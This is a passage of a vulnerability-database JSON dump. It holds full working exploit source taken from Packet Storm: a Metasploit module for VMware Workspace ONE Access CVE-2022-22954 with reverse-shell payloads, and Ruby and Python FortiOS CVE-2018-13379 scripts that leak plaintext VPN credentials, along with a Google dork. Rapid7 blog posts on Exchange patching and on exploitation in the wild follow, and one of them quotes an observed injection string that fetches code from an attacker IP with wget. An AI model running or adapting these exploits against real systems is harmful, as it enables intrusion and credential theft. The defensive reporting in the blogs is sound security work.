"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-03T00:00:00", "id": "PACKETSTORM:166935", "href": "https://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware Workspace ONE Access CVE-2022-22954', \n'Description' => %q{ \nThis module exploits CVE-2022-22954, an unauthenticated server-side \ntemplate injection (SSTI) in VMware Workspace ONE Access, to execute \nshell commands as the \"horizon\" user. \n}, \n'Author' => [ \n'mr_me', # Discovery \n'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) PoC \n'wvu' # Exploit and independent analysis \n], \n'References' => [ \n['CVE', '2022-22954'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'], \n['URL', 'https://srcincite.io/advisories/src-2022-0005/'], \n['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'], \n['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis'] \n# More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433 \n], \n'DisclosureDate' => '2022-04-06', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nret = execute_command(\"echo #{token = rand_text_alphanumeric(8..16)}\") \n \nreturn CheckCode::Unknown unless ret \nreturn CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/) \n \nCheckCode::Vulnerable \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nbash_cmd = \"bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}\" \n \nvprint_status(\"Executing command: #{bash_cmd}\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, ssti_uri), \n'vhost' => rand_text_alphanumeric(8..16), \n'vars_get' => { \n%w[code error].sample => rand_text_alphanumeric(8..16), \n# https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html \nssti_param => %(${\"freemarker.template.utility.Execute\"?new()(\"#{bash_cmd}\")}) \n} \n}, 3.5) \n \nreturn unless res \nreturn '' unless res.code == 400 && res.body.include?('auth.context.invalid') \n \nres.body \nend \n \ndef ssti_uri \n%w[ \n/catalog-portal/hub-ui \n/catalog-portal/hub-ui/byob \n/catalog-portal/ui \n/catalog-portal/ui/oauth/verify \n].sample \nend \n \ndef ssti_param \n%w[deviceType deviceUdid].sample \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166935/vmware_workspace_one_access_cve_2022_22954.rb.txt"}, {"lastseen": "2019-08-20T21:46:14", "description": "", "cvss3": {}, "published": "2019-08-19T00:00:00", "type": "packetstorm", "title": "FortiOS 5.6.7 / 6.0.4 Credential Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "PACKETSTORM:154146", "href": "https://packetstormsecurity.com/files/154146/FortiOS-5.6.7-6.0.4-Credential-Disclosure.html", "sourceData": "`# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. \n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\" \n# Date: 17/08/2019 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://www.fortinet.com/ \n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html \n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n# Tested on: 5.6.6 \n# CVE : CVE-2018-13379 \n \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SSL VPN FortiOs - System file leak', \n'Description' => %q{ \nFortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. \nThis exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). \nThis vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ] \n], \n'Author' => [ 'lynx (Carlos Vieira)' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'}) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing binary file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ow crap, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/154146/fortios-disclose.rb.txt"}, {"lastseen": "2019-08-20T21:46:13", "description": "", "cvss3": {}, "published": "2019-08-19T00:00:00", "type": "packetstorm", "title": "FortiOS 5.6.7 / 6.0.4 Credential Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "PACKETSTORM:154147", "href": "https://packetstormsecurity.com/files/154147/FortiOS-5.6.7-6.0.4-Credential-Disclosure.html", "sourceData": "`# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. \n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\" \n# Date: 17/08/2019 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://www.fortinet.com/ \n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html \n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n# Tested on: 5.6.6 \n# CVE : CVE-2018-13379 \n \n# Exploit SSLVPN Fortinet - FortiOs \n#!/usr/bin/env python \nimport requests, sys, time \nimport urllib3 \nurllib3.disable_warnings() \n \n \ndef leak(host, port): \nprint(\"[!] Leak information...\") \ntry: \nurl = \"https://\"+host+\":\"+port+\"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\" \nheaders = {\"User-Agent\": \"Mozilla/5.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"} \nr=requests.get(url, headers=headers, verify=False, stream=True) \nimg=r.raw.read() \nif \"var fgt_lang =\" in str(img): \nwith open(\"sslvpn_websession_\"+host+\".dat\", 'w') as f: \nf.write(img) \nprint(\"[>] Save to file ....\") \nparse(host) \nprint(\"\\n\") \nreturn True \nelse: \nreturn False \nexcept requests.exceptions.ConnectionError: \nreturn False \ndef is_character_printable(s): \nreturn all((ord(c) < 127) and (ord(c) >= 32) for c in s) \n \ndef is_printable(byte): \nif is_character_printable(byte): \nreturn byte \nelse: \nreturn '.' \n \ndef read_bytes(host, chunksize=8192): \nprint(\"[>] Read bytes from > \" + \"sslvpn_websession\"+host+\".dat\") \nwith open(\"sslvpn_websession_\"+host+\".dat\", \"rb\") as f: \nwhile True: \nchunk = f.read(chunksize) \nif chunk: \nfor b in chunk: \nyield b \nelse: \nbreak \ndef parse(host): \nprint(\"[!] Parsing Information...\") \nmemory_address = 0 \nascii_string = \"\" \nfor byte in read_bytes(host): \nascii_string = ascii_string + is_printable(byte) \nif memory_address%61 == 60: \nif ascii_string!=\".............................................................\": \nprint ascii_string \nascii_string = \"\" \nmemory_address = memory_address + 1 \n \ndef check(host, port): \nprint(\"[!] Check vuln...\") \nuri = \"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\" \ntry: \nr = requests.get(\"https://\" + host + \":\" + port + uri, verify=False) \nif(r.status_code == 200): \nreturn True \nelif(r.status_code == 404): \nreturn False \nelse: \nreturn False \nexcept: \nreturn False \ndef main(host, port): \nprint(\"[+] Start exploiting....\") \nvuln = check(host, port) \nif(vuln): \nprint(\"[+] Target is vulnerable!\") \nbin_file = leak(host, port) \nelse: \nprint(\"[X] Target not vulnerable.\") \n \nif __name__ == \"__main__\": \n \nif(len(sys.argv) < 3): \nprint(\"Use: python {} ip/dns port\".format(sys.argv[0])) \nelse: \nhost = sys.argv[1] \nport = sys.argv[2] \nmain(host, port) \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/154147/fortios-disclose.txt"}], "rapid7blog": [{"lastseen": "2021-10-06T15:02:24", "description": "\n\nIf you've been keeping tabs on the state of vulnerabilities, you've probably noticed that Microsoft Exchange has been in the news more than usual lately. Back in March 2021, Microsoft [acknowledged a series of threats](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) exploiting zero-day CVEs in on-premises instances of Exchange Server. Since then, several related exploit chains targeting Exchange have [continued to be exploited in the wild](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>).\n\nMicrosoft [quickly](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) [released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) [patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>) to help security teams keep attackers out of their Exchange environments. So, what does the state of patching look like today among organizations running impacted instances of Exchange?\n\nThe answer is more mixed \u2014 and more troubling \u2014 than you'd expect.\n\n## What is Exchange, and why should you care?\n\nExchange is a popular email and messaging service that runs on Windows Server operating systems, providing email and calendaring services to tens of thousands of organizations. It also integrates with unified messaging, video chat, and phone services. That makes Exchange an all-in-one messaging service that can handle virtually all communication streams for an enterprise customer.\n\nAn organization's Exchange infrastructure can contain copious amounts of sensitive business and customer information in the form of emails and a type of shared mailbox called Public Folders. This is one of the reasons why Exchange Server vulnerabilities pose such a significant threat. Once compromised, Exchange's search mechanisms can make this data easy to find for attackers, and a robust rules engine means attackers can create hard-to-find automation that forwards data out of the organization.\n\nAn attacker who manages to get into an organization's Exchange Server could gain visibility into their Active Directory or even compromise it. They could also steal credentials and impersonate an authentic user, making phishing and other attempts at fraud more likely to land with targeted victims.\n\n## Sizing up the threats\n\nThe credit for discovering this recent family of Exchange Server vulnerabilities goes primarily to security researcher Orange Tsai, who overviewed them in an August 2021 [Black Hat talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>). He cited 8 vulnerabilities, which resulted in 3 exploit chains:\n\n * ****ProxyLogon:**** This vulnerability could allow attackers to use pre-authentication server-side request forgery (SSRF) plus a post-authentication arbitrary file write, resulting in remote code execution (RCE) on the server.\n * ****ProxyOracle:**** With a cookie from an authenticated user (obtained through a reflected XSS link), a Padding Oracle attack could provide an intruder with plain-text credentials for the user.\n * ****ProxyShell: ****Using a pre-authentication access control list (ACL) bypass, a PrivEsc (not going up to become an administrator but down to a user mailbox), and a post-authentication arbitrary file write, this exploit chain could allow attackers to execute an RCE attack.\n\nGiven the sensitivity of Exchange Server data and the availability of [patches and resources from Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to help defend against these threats, you'd think adoption of these patches would be almost universal. But unfortunately, the picture of patching for this family of vulnerabilities is still woefully incomplete.\n\n## A patchwork of patch statuses\n\nIn Rapid7's OCTO team, we keep tabs on the exposure for major vulnerabilities like these, to keep our customers and the security community apprised of where these threats stand and if they might be at risk. To get a good look at the patch status among Exchange Servers for this family of attack chains, we had to develop new techniques for fingerprinting Exchange versions so we could determine which specific hotfixes had been applied.\n\nWith a few tweaks, we were able to adjust our measurement approach to get a clear enough view that we can draw some strong conclusions about the patch statuses of Exchange Servers on the public-facing internet. Here's what we found:\n\n * Out of the 306,552 Exchange OWA servers we observed, 222,145 \u2014 or 72.4% \u2014were running an impacted version of Exchange (this includes 2013, 2016, and 2019).\n * Of the impacted servers, 29.08% were still unpatched for the ProxyShell vulnerability, and 2.62% were partially patched. That makes 31.7% of servers that may still be vulnerable.\n\n\n\nTo put it another, starker way: 6 months after patches have been available for the ProxyLogon family of vulnerabilities, 1 in 3 impacted Exchange Servers are still susceptible to attacks using the ProxyShell method.\n\nWhen we sort this data by the Exchange Server versions that organizations are using, we see the uncertainty in patch status tends to cluster around specific versions, particularly 2013 Cumulative Update 23. \n\n\n\nWe also pulled the server header for these instances with the goal of using the version of IIS as a proxy indicator of what OS the servers may be running \u2014 and we found an alarmingly large proportion of instances that were running end-of-life servers and/or operating systems, for which Microsoft no longer issues patch updates.\n\n\n\nThat group includes the two bars on the left of this graph, which represent 2007 and 2010 Exchange Server versions: 75,300 instances of 2010 and 8,648 instances of 2007 are still running out there on the internet, roughly 27% of all instances we observed. Organizations still operating these products can count themselves lucky that ProxyShell and ProxyLogon don't impact these older versions of Exchange (as far as we know). But that doesn't mean those companies are out of the woods \u2014 if you still haven't replaced Exchange Server 2010, you're probably also doing other risky things in your environment.\n\nLooking ahead, the next group of products that will go end-of-life are the Windows Server 2012 and 2012 R2 operating systems, represented in green and yellow, respectively, within the graph. That means 92,641 instances of Exchange \u2014 nearly a third of all Exchange Servers on the internet \u2014 will be running unsupported operating systems for which Microsoft isn't obligated to provide security fixes after they go end-of-life in 2023.\n\n## What you can do now\n\nIt's a matter of when, not if, we encounter the next family of vulnerabilities that lets attackers have a field day with huge sets of sensitive data like those contained in Exchange Servers. And for companies that haven't yet patched, ProxyShell and its related attack chains are still a real threat. Here's what you can do now to proactively mitigate these vulnerabilities.\n\n * First things first: If your organization is running one of the 1 in 3 affected instances that are vulnerable due to being unpatched, [install the appropriate patch](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) right away.\n * Stay current with patch updates as a routine priority. It is possible to build Exchange environments with near-100% uptimes, so there isn't much argument to be made for foregoing critical patches in order to prevent production interruptions.\n * If you're running a version of Exchange Server or Windows OS that will soon go end-of-life, start planning for how you'll update to products that Microsoft will continue to support with patches. This way, you'll be able to quickly and efficiently mitigate vulnerabilities that arise, before attackers take advantage of them.\n\nIf you're already a Rapid7 customer, there's good news: [InsightVM](<https://www.rapid7.com/products/insightvm/>) already has authenticated scans to detect these vulnerabilities, so users of the product should already have a good sense of where their Exchange environments stand. On the offensive side, your red teams and penetration testers can highlight the risk of running vulnerable Exchange instances with modules exercising [ProxyLogon](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/>) and [ProxyShell](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>). And as our research team continues to develop techniques for getting this kind of detailed information about exposures, we ensure our products know about those methods so they can more effectively help customers understand their vulnerabilities.\n\nBut for all of us, these vulnerabilities are a reminder that security requires a proactive mindset \u2014 and failing to cover the basics like upgrading to supported products and installing security updates leaves organizations at risk when a particularly thorny set of attack chains rears its head.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T14:07:12", "type": "rapid7blog", "title": "For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-06T14:07:12", "id": "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "href": "https://blog.rapid7.com/2021/10/06/for-microsoft-exchange-server-vulnerabilities-patching-remains-patchy/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-02T22:54:37", "description": "\n\nOn April 6, 2022, VMware published [VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>), which detailed multiple security vulnerabilities. The most severe of these is [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>), a critical remote code execution vulnerability affecting VMware\u2019s Workspace ONE Access and Identity Manager solutions. The vulnerability arises from a server-side template injection flaw and has a CVSSv3 base score of 9.8. Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the VMware user.\n\nRapid7's vulnerability research team has a [full analysis of CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>) in AttackerKB, including chaining the vulnerability with CVE-2022-22960 to escalate to `root.`\n\nAffected products:\n\n * VMware Workspace ONE Access (Access) 20.10.0.0 - 20.10.0.1, 21.08.0.0 - 21.08.0.1\n * VMware Identity Manager (vIDM) 3.3.3 - 3.3.6\n\nVMware updated their advisory to note active exploitation in the wild on April 12, 2022; a day later, security news outlet Bleeping Computer [indicated](<https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-cve-2022-22954-bug-patch-now/>) that several public proof-of-concept exploits were being used in the wild to drop coin miners on vulnerable systems. More recently, security firm Morphisec [published analysis](<https://blog.morphisec.com/vmware-identity-manager-attack-backdoor>) of attacks that exploited CVE-2022-22954 to deploy reverse HTTPS backdoors. Public proof-of-concept exploit code is available and [fits in a tweet](<https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433>) (credit to researchers [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>) and [Udhaya Prakash](<https://twitter.com/sherlocksecure>)).\n\nRapid7\u2019s Project Heisenberg detected scanning/exploitation activity on 2022-04-13 and again on 2022-04-22. A total of 14 requests were observed across ports 80, 98, 443, 4443.\n\n\n\nScanning/exploitation strings observed:\n\n * `/catalog-portal/ui/oauth/verify`\n * `/catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"cat /etc/hosts\")}`\n * `/catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"wget -U \"Hello 1.0\" -qO - http://106[.]246[.]224[.]219/one\")}`\n\nAttacker IP addresses: \n`103[.]42[.]196[.]67` \n`5[.]157[.]38[.]50` \n`54[.]38[.]103[.]1` (NOTE: according to [this French government website](<https://blog.rapid7.com/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/%E2%80%8B%E2%80%8Bhttps://cert.ssi.gouv.fr/scans/>), this IP address is benign) \n`94[.]74[.]123[.]228` \n`96[.]243[.]27[.]61` \n`107[.]174[.]218[.]172` \n`170[.]210[.]45[.]163` \n`173[.]212[.]229[.]216`\n\nThese nodes appear to be members of generic botnets. Rapid7\u2019s Heisenberg network has observed many of them involved in the same campaigns as noted in the above graphic, as well as [Log4Shell](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>) exploitation attempts.\n\n## Mitigation guidance\n\nVMware customers should patch their Workspace ONE Access and Identity Manager installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions [here](<https://kb.vmware.com/s/article/88099>) on patching and applying [workarounds](<https://kb.vmware.com/s/article/88098>). VMware has an FAQ available on this advisory [here](<https://core.vmware.com/vmsa-2022-0011-questions-answers-faq>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-22954 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/vmsa-2022-0011-cve-2022-22954/>) for Unix-like systems. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.)\n\nInsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability. We recommend that you review your settings for this detection rule and confirm it is turned on and [set to an appropriate rule action and priority for your organization](<https://docs.rapid7.com/insightidr/modify-detection-rules>):\n\n * Suspicious Process - VMware Workspace ONE Access Launches Process\n\nFor our MDR service customers, Rapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response (MDR), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary. The MDR team will notify you if suspicious activity is detected in your environment.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T13:25:42", "type": "rapid7blog", "title": "Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-04-29T13:25:42", "id": "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "href": "https://blog.rapid7.com/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-20T20:19:12", "description": "## Anyone enjoy making chains?\n\n\n\nThe community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7's own [wvu](<https://github.com/wvu-r7>) & [Spencer McIntyre](<https://github.com/zeroSteiner>) added a module that implements the ProxyShell exploit chain originally demonstrated by [Orange Tsai](<https://twitter.com/orange_8361>). The module also benefited from research and analysis by [Jang](<https://twitter.com/testanull>), [PeterJson](<https://twitter.com/peterjson>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>) to make it as simple as finding an email for an administrator of vulnerable version of exchange as the entrypoint to chain [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>), [CVE-2021-34523](<https://attackerkb.com/topics/RY7LpTmyCj/cve-2021-34523?referrer=blog>), & [CVE-2021-34473](<https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473?referrer=blog>) into sessions for everyone to enjoy.\n\n## Great to see some GSoC value in the wild.\n\nWith Google Summer of Code 2021 moving into its final phases, [pingport80](<https://github.com/pingport80>) had 4 PRs land in this week's release. These improvements and fixes to interactions with sessions make post exploitation tasks more accessible, bringing the community more capabilities and stability along the way.\n\n## New module content (2)\n\n * [Lucee Administrator imgProcess.cfm Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/15525>) by [wvu](<https://github.com/wvu-r7>),, [iamnoooob](<https://github.com/iamnoooob>), and [rootxharsh](<https://github.com/rootxharsh>), which exploits [CVE-2021-21307](<https://attackerkb.com/topics/16OOl6KSdo/cve-2021-21307?referrer=blog>) \\- An unauthenticated user is permitted to make requests through the `imgProcess.cfm` endpoint, and using the `file` parameter which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.\n * [Microsoft Exchange ProxyShell RCE](<https://github.com/rapid7/metasploit-framework/pull/15561>) by [wvu](<https://github.com/wvu-r7>), [Jang](<https://twitter.com/testanull>), [Orange Tsai](<https://twitter.com/orange_8361>), [PeterJson](<https://twitter.com/peterjson>), [Spencer McIntyre](<https://github.com/zeroSteiner>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>), which exploits [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>) \\- Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.\n\n## Enhancements and features\n\n * [#15540](<https://github.com/rapid7/metasploit-framework/pull/15540>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This adds an option to `cmd_execute` to have the command run in a subshell by Meterpreter.\n * [#15556](<https://github.com/rapid7/metasploit-framework/pull/15556>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session compatibility to the `post/windows/gather/enum_unattend` module.\n * [#15564](<https://github.com/rapid7/metasploit-framework/pull/15564>) from [pingport80](<https://github.com/pingport80>) \\- This adds support to the `get_env` and `command_exists?` post API methods for Powershell session types.\n\n## Bugs fixed\n\n * [#15303](<https://github.com/rapid7/metasploit-framework/pull/15303>) from [pingport80](<https://github.com/pingport80>) \\- This PR ensures that the shell `dir` command returns a list.\n * [#15332](<https://github.com/rapid7/metasploit-framework/pull/15332>) from [pingport80](<https://github.com/pingport80>) \\- This improves localization support and compatibly in the session post API related to the `rename_file` method.\n * [#15539](<https://github.com/rapid7/metasploit-framework/pull/15539>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- This improves the OS version in the `check` method of `exploit/windows/local/cve_2018_8453_win32k_priv_esc`.\n * [#15546](<https://github.com/rapid7/metasploit-framework/pull/15546>) from [timwr](<https://github.com/timwr>) \\- This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it's valid first.\n * [#15570](<https://github.com/rapid7/metasploit-framework/pull/15570>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in the `auxiliary/scanner/smb/smb_enum_gpp` module where the path that was being generated by the module caused an SMB exception to be raised.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 